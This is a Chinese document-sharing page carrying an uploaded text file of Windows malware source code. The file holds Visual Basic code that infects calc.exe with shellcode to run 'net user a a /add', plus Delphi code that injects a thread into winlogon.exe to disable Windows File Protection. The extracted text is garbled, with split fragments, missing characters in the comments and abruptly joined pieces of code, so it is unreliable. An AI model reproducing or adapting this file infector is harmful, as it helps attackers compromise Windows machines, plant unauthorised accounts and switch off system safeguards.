ImageVerifierCode 换一换
格式:TXT , 页数:16 ,大小:24.10KB ,
资源ID:4407143      下载积分:10 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.docduoduo.com/d-4407143.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录   微博登录 

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(vb版感染EXE源码.txt)为本站会员(sjmd695)主动上传,道客多多仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知道客多多(发送邮件至docduoduo@163.com或直接QQ联系客服),我们立即给予删除!

vb版感染EXE源码.txt

1、不发表任何意见。现在呢,当然是把源码开出来啦。当然也不是我写的啦,呵呵。vbgood早有人写了的。不过他那个没加去除文件保护。顺便把这个加上去,呵呵。Option ExplicitPrivate Declare Function SfcIsFileProtected Lib “sfc_os.dll“ Alias “#5“ _(ByVal dwUnknown1 As Long, ByVal lpszFile As Long, ByVal dwUnknown2 As Long) As LongPrivate Sub Command1_Click()On Error GoTo 10Dim szFil

2、e As StringszFile = “c:windowssystem32sethc.exe“ + vbNullCharIf SfcIsFileProtected(0, StrPtr(szFile), -1) = 0 ThenInfectPE “c:windowssystem32calc.exe“, “cmd /c net user a a /add“ElseMsgBox “xx“End IfEnd SubPublic Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As LongDim

3、 i As Long, p As Long, q As Long, sHex As StringOn Error GoTo ERR: 设置错误陷坑感染的ShellcodesHex = “605583EC408BEC5564A1300000008B400C8B701CAD8B78088B473C8B54077803D78B4A188B5A2003“ interfaceusesWindows, SysUtils, WinLogonProcess;Function CloseSFC():Integer;implementationprocedure Root(VOID : Pointer); std

4、call; forward;procedure EndRoot(); forward;function FixedPChar(const Value : PChar) : PChar;forward;typeTLoadLibraryA = function(lpLibFileName : PAnsiChar) : HMODULE; stdcall;TGetProcAddress = function(hModule : HMODULE; lpProcName : LPCSTR) : FARPROC; stdcall;typeTFuncs = recordLoadLibraryA : TLoad

5、LibraryA;GetProcAddress : TGetProcAddress;end;function Init() : TFuncs; forward;/远线程代码开始处procedure Root(VOID : Pointer); stdcall;varFuncs : TFuncs;hSFC : Cardinal;_closeSFC : procedure(); stdcall;beginFuncs := Init();hSFC := Funcs.LoadLibraryA(FixedPChar(sfc.dll);_closeSFC := Funcs.GetProcAddress(hS

6、FC, PChar($2);_closeSFC();end;/修正指针常量在内存中的偏 function FixedPointer(const Value : Pointer) : Pointer;labelsign;varV, K : Cardinal;beginasmcall next /sign:next: pop eax /把EIP 出 Pmov K, eaxmov V, offset nextend;Result := Pointer(K - V + Cardinal(Value);end;/修正PChar常量在内存中的偏 Delphi 的程 有个 点. 常量 a:=abc 中的ab

7、c存 在代码段中.在 现 的 的 . 用的 . 我 的代码 不 定,我 把 的 行修正.Delphi的这个 ,Delphi是在 写currency1代码中最方便的“了.function FixedPChar(const Value : PChar) : PChar;beginResult := FixedPointer(Value);end;/Kernal32.DLL的 .用了PEB的fiflfunction GetK32Addr : Cardinal;asmmov eax,fs:$30mov eax,eax + $0cmov esi,eax + $1clodsdmov eax,eax+$08

8、 /这个 eax中保存的是k32的 了end;/ 是.这个 ”API没有定. 现.function StrSame(A, B : PChar) : Boolean;beginResult := True;if Integer(A) = Integer(B) thenbeginExit;end;while True dobeginif (A Cardinal(S) thenfor I := count - 1 downto 0 doDI := SIelsefor I := 0 to count - 1 doDI := SI;end;/ GetProcAddress的 现.function _Ge

9、tProcAddress(Module : Cardinal; ProcessName : PChar) : Pointer;varExportName : pChar;Address : Cardinal;J : Cardinal;ImageDosHeader : PImageDosHeader;ImageNTHeaders : PImageNTHeaders;ImageExportDirectory : PImageExportDirectory;beginImageDosHeader := Pointer(Module);ImageNTHeaders := Pointer(Module

10、+ ImageDosHeader._lfanew);ImageExportDirectory := Pointer(ImageNtHeaders.OptionalHeader.DataDirectoryIMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress + Module);J := 0;Address := 0;repeatExportName := Pointer(Cardinal(Pointer(Cardinal(ImageExportDirectory.AddressOfNames) + Module + J * 4) + Module);if Str

11、Same(ProcessName, ExportName) thenAddress := Cardinal(Pointer(Word(Pointer(J shl 1 + Cardinal(ImageExportDirectory.AddressOfNameOrdinals) + Module) and$0000FFFF shl 2 + Cardinal(ImageExportDirectory.AddressOfFunctions)+ Module) + Module;Inc(J);until (Address = 0;end;/WinLogon程的IDfunction GetWinLogon

12、PID() : Cardinal;constnSize = $2048 * sizeof(SYSTEM_PROCESS_INFORMATION);varProcessInfo, P : PSYSTEM_PROCESS_INFORMATION;rL : ULONG;states : NTSTATUS;offset : Integer;S : string;Dt : TDateTime;DDt : DWORD;LDt : TFileTime;WinLogon : WideString;beginResult := 0;GetMem(P, nSize);ProcessInfo := P;states

13、 := NtQuerySystemInformation(SystemProcessInformation,ProcessInfo,nSize,rL);if (not NT_SUCCESS(states) thenbeginFreeMem(ProcessInfo);Exit;end;Offset := 0;repeatProcessInfo := PSYSTEM_PROCESS_INFORMATION(DWORD(ProcessInfo) + Offset);WinLogon := ProcessInfo.ImageName.Buffer;if UpperCase(WinLogon) = WINLOGON.EXE thenbeginResult := ProcessInfo.UniqueProcessId;break;end;Offset := ProcessInfo.NextEntryOffset;until (Offset = 0);FreeMem(P);end;end.调用的 用WinLogonProcess, KillSFC 这 个单元,然 调用CloseSFC 了,当见 ,不错的 。

本站链接:文库   一言   我酷   合作


客服QQ:2549714901微博号:道客多多官方知乎号:道客多多

经营许可证编号: 粤ICP备2021046453号世界地图

道客多多©版权所有2020-2025营业执照举报